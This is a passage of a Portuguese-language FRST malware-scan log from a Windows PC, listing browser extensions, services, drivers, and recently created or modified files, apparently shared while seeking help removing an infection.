    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2017-03-27] (Adobe Systems)
    FF Plugin HKU\S-1-5-21-1444981709-1690395092-1683229413-1000: gastecnologia.com.br/sf/abn -> C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\npsf_abn.dll [Nenhum Arquivo]
    FF Plugin HKU\S-1-5-21-1444981709-1690395092-1683229413-1000: gastecnologia.com.br/sf/cef -> C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\npsf_cef.dll [Nenhum Arquivo]
    FF Plugin HKU\S-1-5-21-1444981709-1690395092-1683229413-1000: gastecnologia.com.br/sf/cef64 -> C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\npsf_cef_64.dll [Nenhum Arquivo]
    FF Plugin HKU\S-1-5-21-1444981709-1690395092-1683229413-1000: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-12-25] (Wacom)

    Chrome: 
    =======
    CHR DefaultProfile: Default
    CHR Profile: C:\Users\A\AppData\Local\Google\Chrome\User Data\Default [2017-09-22]
    CHR Extension: (Google Apresentações) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-03]
    CHR Extension: (Google Docs) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-03]
    CHR Extension: (Google Drive) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
    CHR Extension: (YouTube) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
    CHR Extension: (Google Search) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
    CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2017-08-04]
    CHR Extension: (Planilhas do Google) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-03]
    CHR Extension: (Documentos Google off-line) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
    CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
    CHR Extension: (GBBD Caixa Economica Federal) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbcaplhfkihhldmlbjhgajdeghjdbffi [2015-01-24]
    CHR Extension: (Gmail) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-27]
    CHR Extension: (Chrome Media Router) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-15]
    CHR Extension: (Acrobat PDF Reader) - C:\Users\A\AppData\Roaming\Microsoft\Google [2015-01-28]
    CHR Extension: (Acrobat PDF Reader) - C:\Users\A\AppData\Roaming\Microsoft\Microsoft\Console\Application\Google\Update\0315 [2015-03-15]
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx

    ==================== Serviços (Whitelisted) ====================

    (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

    R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [771672 2017-03-14] (Adobe Systems Incorporated)
    R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2246256 2017-05-18] (Adobe Systems, Incorporated)
    S2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe [927232 2012-10-29] ()
    S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [445976 2016-08-03] (BlueStack Systems, Inc.)
    R2 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [425496 2016-08-03] (BlueStack Systems, Inc.)
    S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe [462360 2016-08-03] (BlueStack Systems, Inc.)
    R2 Ds3Service; E:\Arquivos de Programas\Scarlet.Crush Productions\bin\ScpService.exe [381952 2014-04-02] (Scarlet.Crush Productions) [Arquivo não assinado]
    R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-04-11] (Intel Corporation)
    R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [731648 2013-02-13] (Intel(R) Corporation) [Arquivo não assinado]
    S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [820184 2013-02-13] (Intel(R) Corporation)
    R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-03-12] (Intel Corporation)
    R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6058960 2017-08-07] (Malwarebytes)
    R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [Arquivo não assinado]
    S3 NMIndexingService; C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe [279848 2007-06-27] (Nero AG)
    R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495224 2017-06-21] (NVIDIA Corporation)
    S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495224 2017-06-21] (NVIDIA Corporation)
    R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-05-18] (NVIDIA Corporation)
    R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [450168 2017-06-21] (NVIDIA Corporation)
    S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2104840 2016-02-22] (Electronic Arts)
    S3 RoxMediaDBGame1X; C:\Program Files (x86)\Common Files\Roxio Shared\Game1X\SharedCOM\RoxMediaDBGame1X.exe [1096424 2014-07-09] (Corel Corporation)
    S3 Te.Service; C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF\Wex.Services.exe [137216 2016-03-29] (Microsoft Corporation) [Arquivo não assinado]
    S3 VsEtwService120; C:\Program Files (x86)\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe [87728 2013-10-04] (Microsoft Corporation)
    S3 VSStandardCollectorService140; E:\Arquivos de Programas\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [56552 2016-03-22] (Microsoft Corporation)
    R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
    R2 WTabletServiceCon; C:\Program Files\Tablet\Pen\WTabletServiceCon.exe [627992 2014-01-13] (Wacom Technology, Corp.)

    ===================== Drivers (Whitelisted) ======================

    (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

    R2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [152672 2016-08-03] (BlueStack Systems)
    R2 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [307768 2016-07-28] (Bluestack System Inc. )
    S3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2016-01-15] (Disc Soft Ltd)
    S3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2016-01-15] (Disc Soft Ltd)
    R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [77440 2017-08-24] ()
    S3 H5xUSB; C:\Windows\System32\Drivers\uth5x64.sys [109568 2014-07-24] (UT)
    R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2014-04-11] (Intel Corporation)
    R4 IOMap; C:\Windows\system32\drivers\IOMap64.sys [23680 2013-01-25] (ASUSTeK Computer Inc.)
    R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [192960 2017-09-18] (Malwarebytes)
    R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [101824 2017-09-22] (Malwarebytes)
    R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [45472 2017-09-22] (Malwarebytes)
    R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [253888 2017-09-22] (Malwarebytes)
    R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [84256 2017-09-22] (Malwarebytes)
    R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [129312 2014-09-30] (Intel Corporation)
    S3 MotioninJoyXFilter; C:\Windows\System32\DRIVERS\MijXfilt.sys [115272 2015-01-08] (MotioninJoy) [Arquivo não assinado]
    S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30328 2017-06-21] (NVIDIA Corporation)
    R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [48248 2017-06-21] (NVIDIA Corporation)
    R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57976 2017-05-03] (NVIDIA Corporation)
    R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-07-10] (Corel Corporation)
    R3 ScpVBus; C:\Windows\System32\DRIVERS\ScpVBus.sys [39168 2013-05-19] (Scarlet.Crush Productions)
    S3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [42760 2016-02-21] (Microsoft Corporation)
    R2 {B154377D-700F-42cc-9474-23858FBDF4BD}; C:\Program Files (x86)\CyberLink\PowerDVD9\000.fcl [146928 2009-02-28] (CyberLink Corp.)
    S3 catchme; \??\C:\ComboFix\catchme.sys [X]
    S3 X6va017; \??\C:\Windows\SysWOW64\Drivers\X6va017 [X]
    S3 X6va022; \??\C:\Windows\SysWOW64\Drivers\X6va022 [X]

    ==================== NetSvcs (Whitelisted) ===================

    (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)


    ==================== Um Mês Criados arquivos e pastas ========

    (Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

    2017-09-22 19:02 - 2017-09-22 19:02 - 000000000 ____D C:\Users\A\Desktop\FRST-OlderVersion
    2017-09-22 19:00 - 2017-09-22 19:00 - 000000000 ___HD C:\Users\Public\Documents\AdobeGC
    2017-09-21 21:07 - 2017-09-21 21:07 - 000000000 ____D C:\Users\A\AppData\Local\Echo
    2017-09-21 19:51 - 2017-09-21 19:51 - 000000202 _____ C:\Users\A\Desktop\ECHO.url
    2017-09-20 20:00 - 2017-09-20 20:00 - 000004222 _____ C:\Users\A\Desktop\rogue2.txt
    2017-09-19 21:44 - 2017-09-19 21:44 - 000000000 ____D C:\Users\A\AppData\Roaming\3909
    2017-09-19 19:37 - 2017-09-19 19:37 - 000007558 _____ C:\Users\A\Desktop\roguekiller.txt
    2017-09-19 19:19 - 2017-09-20 20:38 - 000028272 _____ C:\Windows\system32\Drivers\TrueSight.sys
    2017-09-19 19:17 - 2017-09-19 19:18 - 026696776 _____ C:\Users\A\Desktop\RogueKiller_portable64.exe
    2017-09-18 23:14 - 2017-09-22 19:00 - 000101824 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
    2017-09-18 23:14 - 2017-09-18 23:14 - 000001210 _____ C:\Users\A\Desktop\eset.txt
    2017-09-17 23:05 - 2017-09-18 23:39 - 000001504 _____ C:\Users\A\Desktop\mbam2.txt
    2017-09-17 23:01 - 2017-09-17 23:01 - 000022497 _____ C:\Users\A\Desktop\mbam.txt
    2017-09-17 21:24 - 2017-09-22 19:00 - 000253888 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
    2017-09-17 21:24 - 2017-09-22 19:00 - 000084256 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
    2017-09-17 21:24 - 2017-09-22 19:00 - 000045472 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
    2017-09-17 21:24 - 2017-09-18 23:14 - 000192960 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
    2017-09-17 21:24 - 2017-09-17 21:24 - 000001830 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
    2017-09-17 21:24 - 2017-09-17 21:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
    2017-09-17 21:23 - 2017-08-24 11:27 - 000077440 _____ C:\Windows\system32\Drivers\mbae64.sys
    2017-09-15 19:08 - 2017-09-15 19:08 - 000010543 _____ C:\Users\A\Desktop\Fixlog.txt
    2017-09-15 19:07 - 2017-09-15 19:07 - 000003443 _____ C:\Users\A\Desktop\fixlist
    2017-09-15 19:06 - 2017-09-22 19:02 - 002399744 _____ (Farbar) C:\Users\A\Desktop\FRST64.exe
    2017-09-15 19:04 - 2017-09-15 19:04 - 000003443 _____ C:\Users\A\fixlist.txt
    2017-09-14 22:00 - 2017-09-14 22:00 - 000000000 ____H C:\Users\A\Documents\Default.rdp
    2017-09-14 21:27 - 2017-09-22 19:03 - 000024175 _____ C:\Users\A\Desktop\FRST.txt
    2017-09-14 21:27 - 2017-09-14 21:27 - 000099260 _____ C:\Users\A\Desktop\Addition.txt
    2017-09-14 21:26 - 2017-09-22 19:03 - 000000000 ____D C:\FRST
    2017-09-13 21:46 - 2017-09-19 19:19 - 000000000 ____D C:\Users\Todos os Usuários\RogueKiller
    2017-09-13 21:46 - 2017-09-19 19:19 - 000000000 ____D C:\ProgramData\RogueKiller
    2017-09-13 21:36 - 2017-09-17 23:15 - 000000000 ____D C:\AdwCleaner
    2017-09-13 20:09 - 2017-09-13 20:09 - 000136984 _____ C:\Users\A\AppData\Local\GDIPFONTCACHEV1.DAT
    2017-09-12 21:00 - 2017-09-12 21:00 - 000000000 ____D C:\Users\Todos os Usuários\Malwarebytes
    2017-09-12 21:00 - 2017-09-12 21:00 - 000000000 ____D C:\ProgramData\Malwarebytes
    2017-09-12 21:00 - 2017-09-12 21:00 - 000000000 ____D C:\Program Files\Malwarebytes
    2017-09-11 22:04 - 2017-09-11 22:04 - 000000397 _____ C:\Users\A\Desktop\Cmd abrindo sozinho.txt
    2017-09-09 15:34 - 2017-09-09 15:34 - 000000202 _____ C:\Users\A\Desktop\Project 1v1 Closed Technical Test.url
    2017-09-09 15:30 - 2017-09-21 21:07 - 000000000 ____D C:\Users\A\AppData\Local\UnrealEngine
    2017-08-31 01:46 - 2017-08-31 01:46 - 000000000 ____D C:\Users\A\AppData\Roaming\Bungie
    2017-08-31 01:16 - 2017-08-31 01:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Destiny 2
    2017-08-29 00:06 - 2017-08-29 00:06 - 000000000 ____D C:\Users\A\AppData\Local\id Software
    2017-08-24 01:24 - 2017-08-24 01:24 - 000000336 _____ C:\Users\A\advanced_ip_scanner_MAC.bin
    2017-08-24 01:24 - 2017-08-24 01:24 - 000000015 _____ C:\Users\A\advanced_ip_scanner_Comments.bin
    2017-08-24 01:24 - 2017-08-24 01:24 - 000000015 _____ C:\Users\A\advanced_ip_scanner_Aliases.bin
    2017-08-24 00:06 - 2017-08-24 00:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced IP Scanner v2
    2017-08-24 00:06 - 2017-08-24 00:06 - 000000000 ____D C:\Program Files (x86)\Advanced IP Scanner
    2017-08-24 00:03 - 2017-08-24 00:03 - 000000000 ____D C:\Users\A\Documents\Network Monitor 3

    ==================== Um Mês Modificados arquivos e pastas ========

    (Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

    2017-09-22 19:01 - 2014-07-17 17:59 - 000000000 ____D C:\Users\A\AppData\Local\Akamai
    2017-09-22 19:00 - 2014-07-04 07:43 - 000000000 ____D C:\Users\Todos os Usuários\NVIDIA
    2017-09-22 19:00 - 2014-07-04 07:43 - 000000000 ____D C:\ProgramData\NVIDIA
    2017-09-22 19:00 - 2009-07-14 02:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
    2017-09-21 19:41 - 2017-04-27 20:23 - 000000000 ____D C:\Users\A\AppData\Local\Adobe
    2017-09-21 19:28 - 2009-07-14 01:45 - 000066112 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2017-09-21 19:28 - 2009-07-14 01:45 - 000066112 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2017-09-21 19:26 - 2011-04-12 10:40 - 000709454 _____ C:\Windows\system32\prfh0416.dat
    2017-09-21 19:26 - 2011-04-12 10:40 - 000148732 _____ C:\Windows\system32\prfc0416.dat
    2017-09-21 19:26 - 2009-07-14 02:13 - 001645972 _____ C:\Windows\system32\PerfStringBackup.INI
    2017-09-21 19:26 - 2009-07-14 00:20 - 000000000 ____D C:\Windows\inf
    2017-09-20 00:15 - 2017-05-07 21:23 - 000000000 ____D C:\Users\A\AppData\Local\CrashDumps
    2017-09-15 19:04 - 2014-07-04 07:44 - 000000000 ____D C:\Users\A
    2017-09-14 23:02 - 2015-02-05 10:23 - 000004384 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
    2017-09-14 23:02 - 2014-12-10 19:48 - 000803328 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
    2017-09-14 23:02 - 2014-12-10 19:48 - 000144896 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
    2017-09-14 23:02 - 2014-07-02 21:04 - 000000000 ____D C:\Windows\SysWOW64\Macromed
    2017-09-14 23:02 - 2014-07-02 21:04 - 000000000 ____D C:\Windows\system32\Macromed
    2017-09-14 21:51 - 2014-07-02 02:40 - 000000000 ____D C:\Users\A\AppData\Local\NVIDIA Corporation
    2017-09-14 21:51 - 2009-07-14 00:20 - 000000000 ____D C:\Windows\registration
    2017-09-03 21:57 - 2009-07-14 00:20 - 000000000 ____D C:\Windows\system32\NDF
    2017-08-31 22:54 - 2016-12-20 10:47 - 000000000 ____D C:\Users\A\AppData\Local\Battle.net
    2017-08-31 22:53 - 2016-12-20 10:42 - 000000000 ____D C:\Program Files (x86)\Battle.net
    2017-08-31 20:32 - 2017-04-27 21:02 - 000002453 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat DC.lnk
    2017-08-31 20:32 - 2017-04-27 21:02 - 000002040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat Distiller DC.lnk
    2017-08-30 20:58 - 2017-07-01 02:35 - 000000000 ____D C:\Program Files\Rockstar Games
    2017-08-30 20:58 - 2017-07-01 02:35 - 000000000 ____D C:\Program Files (x86)\Rockstar Games
    2017-08-28 20:57 - 2017-07-26 20:37 - 000000000 ____D C:\Users\A\Downloads\PopcornTime
    2017-08-28 20:03 - 2014-12-20 01:55 - 000002402 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

    ==================== Arquivos na raiz de alguns diretórios =======

    2015-03-19 19:43 - 2015-03-19 19:43 - 000000092 _____ () C:\Users\A\AppData\Roaming\settings.xml
    2014-12-02 21:13 - 2014-12-02 21:13 - 000017804 _____ () C:\Users\A\AppData\Roaming\unins001.dat
    2017-09-19 08:26 - 2017-09-19 08:26 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BIT22CB.tmp
    2017-09-09 18:08 - 2017-09-09 18:08 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BIT56C.tmp
    2017-09-13 21:59 - 2017-09-13 21:59 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BIT8E5.tmp
    2017-09-20 19:26 - 2017-09-20 19:26 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITB93B.tmp
    2017-08-03 22:48 - 2017-08-03 22:48 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITC58F.tmp
    2017-09-10 12:41 - 2017-09-10 12:41 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITC88E.tmp
    2017-07-24 21:20 - 2017-07-24 21:20 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITC960.tmp
    2017-09-17 21:14 - 2017-09-17 21:14 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITC99D.tmp
    2017-08-27 10:05 - 2017-08-27 10:05 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITCCB9.tmp
    2017-08-13 21:54 - 2017-08-13 21:54 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITD286.tmp
    2017-06-11 22:17 - 2017-06-11 22:17 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITD2D8.tmp
    2017-08-20 10:14 - 2017-08-20 10:14 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITDCA8.tmp
    2017-07-16 09:18 - 2017-07-16 09:18 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITDD7A.tmp
    2017-08-06 11:46 - 2017-08-06 11:46 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITDF6D.tmp
    2017-09-08 23:52 - 2017-09-08 23:52 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE319.tmp
    2017-09-14 22:07 - 2017-09-14 22:07 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE4AD.tmp
    2017-09-21 19:36 - 2017-09-21 19:36 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE6A1.tmp
    2017-09-17 23:31 - 2017-09-17 23:31 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE6B6.tmp
    2017-08-16 20:14 - 2017-08-16 20:14 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE73A.tmp
    2017-08-31 20:33 - 2017-08-31 20:33 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE7AD.tmp
    2017-08-04 20:39 - 2017-08-04 20:39 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE7E5.tmp
    2017-07-28 19:25 - 2017-07-28 19:25 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE7F8.tmp
    2017-09-20 00:29 - 2017-09-20 00:29 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE81D.tmp
    2017-08-06 19:46 - 2017-08-06 19:46 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE86B.tmp
    2017-09-18 10:09 - 2017-09-18 10:09 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE8BA.tmp
    2017-08-19 09:16 - 2017-08-19 09:16 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE8C9.tmp
    2017-09-12 21:48 - 2017-09-12 21:48 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE926.tmp
    2017-09-09 12:42 - 2017-09-09 12:42 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE936.tmp
    2017-08-29 22:06 - 2017-08-29 22:06 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE94D.tmp
    2017-08-24 21:28 - 2017-08-24 21:28 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE95F.tmp
    2017-08-06 16:59 - 2017-08-06 16:59 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE964.tmp
    2017-08-17 20:38 - 2017-08-17 20:38 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE967.tmp
    2017-09-18 19:19 - 2017-09-18 19:19 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE96E.tmp
    2017-08-23 20:07 - 2017-08-23 20:07 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE98A.tmp
    2017-07-29 08:11 - 2017-07-29 08:11 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE9C2.tmp
    2017-09-15 19:23 - 2017-09-15 19:23 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE9C4.tmp
    2017-09-03 18:14 - 2017-09-03 18:14 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE9D1.tmp
    2017-08-12 00:31 - 2017-08-12 00:31 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA0E.tmp
    2017-09-20 20:51 - 2017-09-20 20:51 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA1F.tmp
    2017-08-21 19:34 - 2017-08-21 19:34 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA49.tmp
    2017-09-02 22:26 - 2017-09-02 22:26 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA4F.tmp
    2017-08-25 19:29 - 2017-08-25 19:29 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA57.tmp
    2017-09-04 20:26 - 2017-09-04 20:26 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA69.tmp
    2017-07-27 19:41 - 2017-07-27 19:41 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA87.tmp
    2017-07-25 20:45 - 2017-07-25 20:45 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEAA3.tmp
    2017-07-16 15:10 - 2017-07-16 15:10 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEABE.tmp
    2017-09-19 19:25 - 2017-09-19 19:25 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB42.tmp
    2017-08-23 23:12 - 2017-08-23 23:12 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB49.tmp
    2017-09-16 09:17 - 2017-09-16 09:17 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB4A.tmp
    2017-07-16 20:04 - 2017-07-16 20:04 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB59.tmp
    2017-09-01 19:55 - 2017-09-01 19:55 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB5E.tmp
    2017-08-28 20:07 - 2017-08-28 20:07 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB64.tmp
    2017-07-20 20:13 - 2017-07-20 20:13 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB73.tmp
    2017-08-15 16:31 - 2017-08-15 16:31 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB84.tmp
    2017-07-21 20:08 - 2017-07-21 20:08 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB8D.tmp
    2017-07-18 22:00 - 2017-07-18 22:00 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB91.tmp
    2017-09-18 00:17 - 2017-09-18 00:17 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEBA5.tmp
    2017-07-16 19:28 - 2017-07-16 19:28 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEBC5.tmp
    2017-08-19 10:22 - 2017-08-19 10:22 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEBC6.tmp
    2017-08-26 08:40 - 2017-08-26 08:40 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEBC7.tmp
    2017-09-13 22:18 - 2017-09-13 22:18 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEC03.tmp
    2017-09-03 10:55 - 2017-09-03 10:55 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEC59.tmp
    2017-09-09 20:31 - 2017-09-09 20:31 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEC61.tmp
    2017-09-14 20:37 - 2017-09-14 20:37 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEC8B.tmp
    2017-09-12 20:35 - 2017-09-12 20:35 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITED28.tmp
    2017-09-07 13:27 - 2017-09-07 13:27 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITED5A.tmp
    2017-07-15 17:18 - 2017-07-15 17:18 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITED6A.tmp
    2017-08-18 23:37 - 2017-08-18 23:37 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITED82.tmp
    2017-09-06 21:50 - 2017-09-06 21:50 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEE1C.tmp
